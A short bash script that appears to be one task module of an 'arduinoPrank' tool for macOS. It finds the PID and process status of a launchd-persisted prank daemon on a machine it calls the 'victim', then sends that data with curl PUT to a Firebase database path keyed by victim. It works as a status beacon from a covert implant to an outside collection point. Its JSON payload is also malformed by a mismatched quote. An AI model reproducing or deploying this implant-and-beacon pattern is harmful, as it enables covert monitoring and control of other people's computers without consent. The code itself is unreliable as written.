#!/usr/bin/env bash
# REST API
# https://firebase.google.com/docs/reference/rest/database/

# Get the location of this script.
SCRIPTDIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )

# Define the task ID
thisTaskID="status"

# Get some default functions and variables from the deployment
source "$SCRIPTDIR/deploy"


###############################################################################

# Get the program parameters.

victim="$1"
rootIteration="$2"

###############################################################################

# Your own code

echo $SCRIPTDIR

dPID=`launchctl list | grep io.github.thiesgehrmann.arduinoPrank | cut -f1`
psResult=`ps ux -p $dPID | tail -n1`

echo `echo $psResult | cut -d' ' -f4`

curl -X PUT -d "
  {
    \"ps\" : \"$psResult',
    \"PID\" : \"$dPID\"
  }" \
 "https://${firebaseProject}.firebaseio.com/victims/$victim/$thisTaskID.json"

###############################################################################

#Finally, you should sleep as well. Try not to use the computer's resources too much,
# It is only a prank, after all.

sleep 15
